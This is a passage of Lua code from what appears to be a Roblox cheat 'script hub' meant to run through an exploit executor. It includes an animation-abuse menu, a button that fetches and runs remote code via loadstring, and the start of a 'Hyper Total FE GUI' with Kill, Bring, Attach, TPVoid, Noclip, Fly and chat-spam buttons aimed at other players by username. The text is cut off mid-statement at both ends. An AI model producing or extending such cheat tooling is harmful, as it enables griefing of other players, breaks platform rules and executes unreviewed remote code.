319, 0, 104) Bend.Size = UDim2.new(0, 119, 0, 34) Bend.Font = Enum.Font.Highway Bend.FontSize = Enum.FontSize.Size24 Bend.Text = "Bend" Bend.TextSize = 20 Bend.TextWrapped = true RotateSlash.Name = "RotateSlash" RotateSlash.Parent = ScrollingFrameR15 RotateSlash.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) RotateSlash.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) RotateSlash.Position = UDim2.new(0, 319, 0, 60) RotateSlash.Size = UDim2.new(0, 119, 0, 34) RotateSlash.Font = Enum.Font.Highway RotateSlash.FontSize = Enum.FontSize.Size24 RotateSlash.Text = "RotateSlash" RotateSlash.TextSize = 20 RotateSlash.TextWrapped = true FlingArms.Name = "FlingArms" FlingArms.Parent = ScrollingFrameR15 FlingArms.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) FlingArms.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) FlingArms.Position = UDim2.new(0, 168, 0, 60) FlingArms.Size = UDim2.new(0, 119, 0, 34) FlingArms.Font = Enum.Font.Highway FlingArms.FontSize = Enum.FontSize.Size24 FlingArms.Text = "FlingArms" FlingArms.TextSize = 20 FlingArms.TextWrapped = true -- Buttons col = Color3.new(0.886275, 0.776471, 0.368627) loc = Color3.new(1, 0.906471, 0.568627) rcol = Color3.new(0.682353, 0.701961, 0.792157) rloc = Color3.new(0.882353, 0.901961, 0.992157) CloseGUI.MouseButton1Click:connect(function() MainFrame.Visible = false SideFrame.Visible = true SideFrame.Position = MainFrame.Position end) OpenGUI.MouseButton1Click:connect(function() MainFrame.Visible = true SideFrame.Visible = false MainFrame.Position = SideFrame.Position end) if (game:GetService"Players".LocalPlayer.Character:WaitForChild("Humanoid").RigType == Enum.HumanoidRigType.R15) then ScrollingFrame.Visible = false ScrollingFrameR15.Visible = true CheckR.Text = "Showing R15 Animations" else ScrollingFrame.Visible = true ScrollingFrameR15.Visible = false CheckR.Text = "Showing R6 Animations" end local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://35154961" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local HeadThrowACTIVE = false HeadThrow.MouseButton1Click:connect(function() HeadThrowACTIVE = not HeadThrowACTIVE if HeadThrowACTIVE then HeadThrow.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if HeadThrowACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() HeadThrow.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://121572214" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local FloatingHeadACTIVE = false FloatingHead.MouseButton1Click:connect(function() FloatingHeadACTIVE = not FloatingHeadACTIVE if FloatingHeadACTIVE then track:Play(.1, 1, 1) FloatingHead.BackgroundColor3 = loc else track:Stop() FloatingHead.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://182724289" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local CrouchACTIVE = false Crouch.MouseButton1Click:connect(function() CrouchACTIVE = not CrouchACTIVE if CrouchACTIVE then track:Play(.1, 1, 1) Crouch.BackgroundColor3 = loc else track:Stop() Crouch.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://282574440" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local FloorCrawlACTIVE = false FloorCrawl.MouseButton1Click:connect(function() FloorCrawlACTIVE = not FloorCrawlACTIVE if FloorCrawlACTIVE then track:Play(.1, 1, 1) FloorCrawl.BackgroundColor3 = loc else track:Stop() FloorCrawl.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204328711" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local DinoWalkACTIVE = false DinoWalk.MouseButton1Click:connect(function() DinoWalkACTIVE = not DinoWalkACTIVE if DinoWalkACTIVE then track:Play(.1, 1, 1) DinoWalk.BackgroundColor3 = loc else track:Stop() DinoWalk.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://429681631" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local JumpingJacksACTIVE = false JumpingJacks.MouseButton1Click:connect(function() JumpingJacksACTIVE = not JumpingJacksACTIVE if JumpingJacksACTIVE then track:Play(.1, 1, 1) JumpingJacks.BackgroundColor3 = loc else track:Stop() JumpingJacks.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://35154961" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local LoopHeadACTIVE = false LoopHead.MouseButton1Click:connect(function() LoopHeadACTIVE = not LoopHeadACTIVE if LoopHeadACTIVE then LoopHead.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if LoopHeadACTIVE then track:Play(.5, 1, 1e6) end end end else track:Stop() LoopHead.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://184574340" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local HeroJumpACTIVE = false HeroJump.MouseButton1Click:connect(function() HeroJumpACTIVE = not HeroJumpACTIVE if HeroJumpACTIVE then HeroJump.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if HeroJumpACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() HeroJump.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://181526230" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local FaintACTIVE = false Faint.MouseButton1Click:connect(function() FaintACTIVE = not FaintACTIVE if FaintACTIVE then track:Play(.1, 1, 1) Faint.BackgroundColor3 = loc else track:Stop() Faint.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://181525546" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local FloorFaintACTIVE = false FloorFaint.MouseButton1Click:connect(function() FloorFaintACTIVE = not FloorFaintACTIVE if FloorFaintACTIVE then FloorFaint.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if FloorFaintACTIVE then track:Play(.1, 1, 2) end end end else track:Stop() FloorFaint.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://181525546" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SuperFaintACTIVE = false SuperFaint.MouseButton1Click:connect(function() SuperFaintACTIVE = not SuperFaintACTIVE if SuperFaintACTIVE then SuperFaint.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if SuperFaintACTIVE then track:Play(.1, 0.5, 40) end end end else track:Stop() SuperFaint.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://313762630" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local LevitateACTIVE = false Levitate.MouseButton1Click:connect(function() LevitateACTIVE = not LevitateACTIVE if LevitateACTIVE then track:Play(.1, 1, 1) Levitate.BackgroundColor3 = loc else track:Stop() Levitate.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://183412246" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local DabACTIVE = false Dab.MouseButton1Click:connect(function() DabACTIVE = not DabACTIVE if DabACTIVE then Dab.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if DabACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() Dab.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://188632011" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SpinACTIVE = false Spinner.MouseButton1Click:connect(function() SpinACTIVE = not SpinACTIVE if SpinACTIVE then Spinner.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if SpinACTIVE then track:Play(.1, 1, 2) end end end else track:Stop() Spinner.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://179224234" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local FloatSitACTIVE = false FloatSit.MouseButton1Click:connect(function() FloatSitACTIVE = not FloatSitACTIVE if FloatSitACTIVE then track:Play(.1, 1, 1) FloatSit.BackgroundColor3 = loc else track:Stop() FloatSit.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://429703734" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local MovingDanceACTIVE = false MovingDance.MouseButton1Click:connect(function() MovingDanceACTIVE = not MovingDanceACTIVE if MovingDanceACTIVE then MovingDance.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if MovingDanceACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() MovingDance.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local WeirdMoveACTIVE = false WeirdMove.MouseButton1Click:connect(function() WeirdMoveACTIVE = not WeirdMoveACTIVE if WeirdMoveACTIVE then track:Play(.1, 1, 1) WeirdMove.BackgroundColor3 = loc else track:Stop() WeirdMove.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local CloneIllusionACTIVE = false CloneIllusion.MouseButton1Click:connect(function() CloneIllusionACTIVE = not CloneIllusionACTIVE if CloneIllusionACTIVE then track:Play(.5, 1, 1e7) CloneIllusion.BackgroundColor3 = loc else track:Stop() CloneIllusion.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://313762630" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local GlitchLevitateACTIVE = false GlitchLevitate.MouseButton1Click:connect(function() GlitchLevitateACTIVE = not GlitchLevitateACTIVE if GlitchLevitateACTIVE then track:Play(.5, 1, 1e7) GlitchLevitate.BackgroundColor3 = loc else track:Stop() GlitchLevitate.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://429730430" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SpinDanceACTIVE = false SpinDance.MouseButton1Click:connect(function() SpinDanceACTIVE = not SpinDanceACTIVE if SpinDanceACTIVE then SpinDance.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if SpinDanceACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() SpinDance.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://45834924" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local MoonDanceACTIVE = false MoonDance.MouseButton1Click:connect(function() MoonDanceACTIVE = not MoonDanceACTIVE if MoonDanceACTIVE then MoonDance.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if MoonDanceACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() MoonDance.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204062532" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local FullPunchACTIVE = false FullPunch.MouseButton1Click:connect(function() FullPunchACTIVE = not FullPunchACTIVE if FullPunchACTIVE then FullPunch.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if FullPunchACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() FullPunch.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://186934910" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SpinDance2ACTIVE = false SpinDance2.MouseButton1Click:connect(function() SpinDance2ACTIVE = not SpinDance2ACTIVE if SpinDance2ACTIVE then SpinDance2.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if SpinDance2ACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() SpinDance2.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204292303" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local BowDownACTIVE = false BowDown.MouseButton1Click:connect(function() BowDownACTIVE = not BowDownACTIVE if BowDownACTIVE then BowDown.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if BowDownACTIVE then track:Play(.1, 1, 3) end end end else track:Stop() BowDown.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204295235" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SwordSlamACTIVE = false SwordSlam.MouseButton1Click:connect(function() SwordSlamACTIVE = not SwordSlamACTIVE if SwordSlamACTIVE then SwordSlam.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if SwordSlamACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() SwordSlam.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204295235" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local LoopSlamACTIVE = false LoopSlam.MouseButton1Click:connect(function() LoopSlamACTIVE = not LoopSlamACTIVE if LoopSlamACTIVE then LoopSlam.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if LoopSlamACTIVE then track:Play(.1, 1, 1e4) end end end else track:Stop() LoopSlam.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://184574340" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local MegaInsaneACTIVE = false MegaInsane.MouseButton1Click:connect(function() MegaInsaneACTIVE = not MegaInsaneACTIVE if MegaInsaneACTIVE then MegaInsane.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if MegaInsaneACTIVE then track:Play(.1, 0.5, 40) end end end else track:Stop() MegaInsane.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://126753849" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SuperPunchACTIVE = false SuperPunch.MouseButton1Click:connect(function() SuperPunchACTIVE = not SuperPunchACTIVE if SuperPunchACTIVE then SuperPunch.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if SuperPunchACTIVE then track:Play(.1, 1, 3) end end end else track:Stop() SuperPunch.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://218504594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local FullSwingACTIVE = false FullSwing.MouseButton1Click:connect(function() FullSwingACTIVE = not FullSwingACTIVE if FullSwingACTIVE then FullSwing.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if FullSwingACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() FullSwing.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://259438880" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local ArmTurbineACTIVE = false ArmTurbine.MouseButton1Click:connect(function() ArmTurbineACTIVE = not ArmTurbineACTIVE if ArmTurbineACTIVE then track:Play(.1, 1, 1e3) ArmTurbine.BackgroundColor3 = loc else track:Stop() ArmTurbine.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://136801964" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local BarrelRollACTIVE = false BarrelRoll.MouseButton1Click:connect(function() BarrelRollACTIVE = not BarrelRollACTIVE if BarrelRollACTIVE then BarrelRoll.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if BarrelRollACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() BarrelRoll.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://180612465" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local ScaredACTIVE = false Scared.MouseButton1Click:connect(function() ScaredACTIVE = not ScaredACTIVE if ScaredACTIVE then Scared.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if ScaredACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() Scared.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://33796059" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local InsaneACTIVE = false Insane.MouseButton1Click:connect(function() InsaneACTIVE = not InsaneACTIVE if InsaneACTIVE then track:Play(.1, 1, 1e8) Insane.BackgroundColor3 = loc else track:Stop() Insane.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://33169583" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local ArmDetachACTIVE = false ArmDetach.MouseButton1Click:connect(function() ArmDetachACTIVE = not ArmDetachACTIVE if ArmDetachACTIVE then ArmDetach.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if ArmDetachACTIVE then track:Play(.1, 1, 1e6) end end end else track:Stop() ArmDetach.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://35978879" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SwordSliceACTIVE = false SwordSlice.MouseButton1Click:connect(function() SwordSliceACTIVE = not SwordSliceACTIVE if SwordSliceACTIVE then track:Play(.1, 1, 1) SwordSlice.BackgroundColor3 = loc else track:Stop() SwordSlice.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://27432691" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local InsaneArmsACTIVE = false InsaneArms.MouseButton1Click:connect(function() InsaneArmsACTIVE = not InsaneArmsACTIVE if InsaneArmsACTIVE then InsaneArms.BackgroundColor3 = loc while wait() do if track.IsPlaying == false then if InsaneArmsACTIVE then track:Play(.1, 1, 1e4) end end end else track:Stop() InsaneArms.BackgroundColor3 = col end end) -- R15 local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://674871189" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local CrazySlashACTIVE = false CrazySlash.MouseButton1Click:connect(function() CrazySlashACTIVE = not CrazySlashACTIVE if CrazySlashACTIVE then CrazySlash.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if CrazySlashACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() CrazySlash.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://582855105" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local OpenACTIVE = false Open.MouseButton1Click:connect(function() OpenACTIVE = not OpenACTIVE if OpenACTIVE then Open.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if OpenACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() Open.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://754658275" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local R15SpinnerACTIVE = false R15Spinner.MouseButton1Click:connect(function() R15SpinnerACTIVE = not R15SpinnerACTIVE if R15SpinnerACTIVE then R15Spinner.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if R15SpinnerACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() R15Spinner.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://582384156" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local ArmsOutACTIVE = false ArmsOut.MouseButton1Click:connect(function() ArmsOutACTIVE = not ArmsOutACTIVE if ArmsOutACTIVE then ArmsOut.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if ArmsOutACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() ArmsOut.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://717879555" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local FloatSlashACTIVE = false FloatSlash.MouseButton1Click:connect(function() FloatSlashACTIVE = not FloatSlashACTIVE if FloatSlashACTIVE then FloatSlash.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if FloatSlashACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() FloatSlash.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://708553116" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) WeirdZombieACTIVE = false WeirdZombie.MouseButton1Click:connect(function() WeirdZombieACTIVE = not WeirdZombieACTIVE if WeirdZombieACTIVE then WeirdZombie.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if WeirdZombieACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() WeirdZombie.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://746398327" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) DownSlashACTIVE = false DownSlash.MouseButton1Click:connect(function() DownSlashACTIVE = not DownSlashACTIVE if DownSlashACTIVE then DownSlash.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if DownSlashACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() DownSlash.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://675025795" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) PullACTIVE = false Pull.MouseButton1Click:connect(function() PullACTIVE = not PullACTIVE if PullACTIVE then Pull.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if PullACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() Pull.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://698251653" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) CircleArmACTIVE = false CircleArm.MouseButton1Click:connect(function() CircleArmACTIVE = not CircleArmACTIVE if CircleArmACTIVE then CircleArm.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if CircleArmACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() CircleArm.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://696096087" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) BendACTIVE = false Bend.MouseButton1Click:connect(function() BendACTIVE = not BendACTIVE if BendACTIVE then Bend.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if BendACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() Bend.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://675025570" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) RotateSlashACTIVE = false RotateSlash.MouseButton1Click:connect(function() RotateSlashACTIVE = not RotateSlashACTIVE if RotateSlashACTIVE then RotateSlash.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if RotateSlashACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() RotateSlash.BackgroundColor3 = rcol end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://754656200" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) FlingArmsACTIVE = false FlingArms.MouseButton1Click:connect(function() FlingArmsACTIVE = not FlingArmsACTIVE if FlingArmsACTIVE then FlingArms.BackgroundColor3 = rloc while wait() do if track.IsPlaying == false then if FlingArmsACTIVE then track:Play(.1, 1, 10) end end end else track:Stop() FlingArms.BackgroundColor3 = rcol end end) -- Finished update! end }) GUIS:AddButton({ Title = "Atrava FE GUI", Description = "Atrava FE GUI", Callback = function() loadstring(game:GetObjects("rbxassetid://1468845733")[1].Source)() end }) GUIS:AddButton({ Title = "Hyper Total FE GUI", Description = "Hyper Total FE GUI", Callback = function() -- Credit to Timeless/xFunnieuss for the partial names/short names -- Objects local HyperTotal = Instance.new("ScreenGui") local MainFrame = Instance.new("Frame") local TopFrame = Instance.new("Frame") local Title = Instance.new("TextLabel") local EnterUsername = Instance.new("TextBox") local CloseGUI = Instance.new("TextButton") local CreditTXT = Instance.new("TextLabel") local Sections = Instance.new("Frame") local INTRO = Instance.new("Frame") local FE_CHECK = Instance.new("TextLabel") local Guide1 = Instance.new("TextLabel") local Guide2 = Instance.new("TextLabel") local Credit = Instance.new("TextLabel") local RocketPropulsion = Instance.new("Frame") local ROCKETPROPULSIONGUIDE = Instance.new("TextLabel") local Push = Instance.new("TextButton") local Flatten = Instance.new("TextButton") local Float = Instance.new("TextButton") local Max = Instance.new("TextButton") local AimHead = Instance.new("TextButton") local SlowAttract = Instance.new("TextButton") local Experimental = Instance.new("TextButton") local Multiple = Instance.new("TextButton") local Teleportation = Instance.new("Frame") local TELEPORTATIONGUIDE = Instance.new("TextLabel") local TeleportTo = Instance.new("TextButton") local LockOn = Instance.new("TextButton") local LockArm = Instance.new("TextButton") local LockLeg = Instance.new("TextButton") local LockHead = Instance.new("TextButton") local LockMax = Instance.new("TextButton") local LockAbove = Instance.new("TextButton") local Trail = Instance.new("TextButton") local Tools = Instance.new("Frame") local TOOLSGUIDE = Instance.new("TextLabel") local Kill = Instance.new("TextButton") local KillSurvive = Instance.new("TextButton") local Attach = Instance.new("TextButton") local Bring = Instance.new("TextButton") local SuperSpin = Instance.new("TextButton") local FreeFall = Instance.new("TextButton") local AttachExperimental = Instance.new("TextButton") local GiveTool = Instance.new("TextButton") local Basic = Instance.new("Frame") local BASICGUIDE = Instance.new("TextLabel") local Speed = Instance.new("TextButton") local JumpHeight = Instance.new("TextButton") local Chat = Instance.new("TextButton") local Spam = Instance.new("TextButton") local Fly = Instance.new("TextButton") local Noclip = Instance.new("TextButton") local HipHeight = Instance.new("TextButton") local STATCHANGE = Instance.new("TextBox") local CHATBOX = Instance.new("TextBox") local Local_Player = Instance.new("Frame") local Local_PlayerGUIDE = Instance.new("TextLabel") local CrazySpin = Instance.new("TextButton") local CrouchRocket = Instance.new("TextButton") local Haunted = Instance.new("TextButton") local CloneIllusion = Instance.new("TextButton") local Levitate = Instance.new("TextButton") local Dinosaur = Instance.new("TextButton") local Glitchy = Instance.new("TextButton") local NoLimbs = Instance.new("TextButton") local Animations = Instance.new("Frame") local ANIMATIONSGUIDE = Instance.new("TextLabel") local _18 = Instance.new("TextButton") local Hide = Instance.new("TextButton") local PushLock = Instance.new("TextButton") local SlamOn = Instance.new("TextButton") local LevitateOn = Instance.new("TextButton") local Dance = Instance.new("TextButton") local ExperimentalAnimation = Instance.new("TextButton") local Carpet = Instance.new("TextButton") local Extra = Instance.new("Frame") local EXTRAGUIDE = Instance.new("TextLabel") local Sit = Instance.new("TextButton") local Jump = Instance.new("TextButton") local PlatformStand = Instance.new("TextButton") local Freeze = Instance.new("TextButton") local Insane = Instance.new("TextButton") local TPVoid = Instance.new("TextButton") local Unknown = Instance.new("TextButton") local Reset = Instance.new("TextButton") local SelectTabs = Instance.new("ScrollingFrame") local RocketPropulsionTAB = Instance.new("TextButton") local TeleportationTAB = Instance.new("TextButton") local ToolsTAB = Instance.new("TextButton") local AnimationsTAB = Instance.new("TextButton") local BasicTAB = Instance.new("TextButton") local Local_PlayerTAB = Instance.new("TextButton") local ExtraTAB = Instance.new("TextButton") local SideTopFrame = Instance.new("Frame") local SideTitle = Instance.new("TextLabel") local OpenGUI = Instance.new("TextButton") local SideCreditTXT = Instance.new("TextLabel") local SideFrame = Instance.new("Frame") local BrickFrame = Instance.new("Frame") -- Properties HyperTotal.Name = "HyperTotal" HyperTotal.Parent = game:GetService("CoreGui") MainFrame.Name = "MainFrame" MainFrame.Parent = HyperTotal MainFrame.Active = true MainFrame.BackgroundColor3 = Color3.new(1, 1, 1) MainFrame.BackgroundTransparency = 1 MainFrame.Draggable = true MainFrame.Position = UDim2.new(0.348623842, 0, 1, 0) MainFrame.Size = UDim2.new(0, 350, 0, 270) TopFrame.Name = "TopFrame" TopFrame.Parent = MainFrame TopFrame.BackgroundColor3 = Color3.new(0.121569, 0.121569, 0.121569) TopFrame.BorderColor3 = Color3.new(0.121569, 0.121569, 0.121569) TopFrame.BorderSizePixel = 2 TopFrame.Position = UDim2.new(-0.286500663, 0, 0, 0) TopFrame.Size = UDim2.new(0, 450, 0, 40) TopFrame.ZIndex = 9 Title.Name = "Title" Title.Parent = TopFrame Title.BackgroundColor3 = Color3.new(1, 1, 1) Title.BackgroundTransparency = 1 Title.Position = UDim2.new(0.356534153, 0, 0, 0) Title.Size = UDim2.new(0, 150, 0, 40) Title.ZIndex = 10 Title.Font = Enum.Font.SourceSansItalic Title.FontSize = Enum.FontSize.Size36 Title.Text = "HyperTotal" Title.TextColor3 = Color3.new(0.933333, 0.670588, 0.0509804) Title.TextSize = 35 Title.TextWrapped = true EnterUsername.Name = "EnterUsername" EnterUsername.Parent = TopFrame EnterUsername.BackgroundColor3 = Color3.new(1, 1, 1) EnterUsername.BorderColor3 = Color3.new(0.968628, 0.698039, 0.0588235) EnterUsername.BorderSizePixel = 2 EnterUsername.Position = UDim2.new(0.0199999996, 0, 0.200000003, 0) EnterUsername.Size = UDim2.new(0, 120, 0, 24) EnterUsername.ZIndex = 10 EnterUsername.Font = Enum.Font.SourceSans EnterUsername.FontSize = Enum.FontSize.Size14 EnterUsername.Text 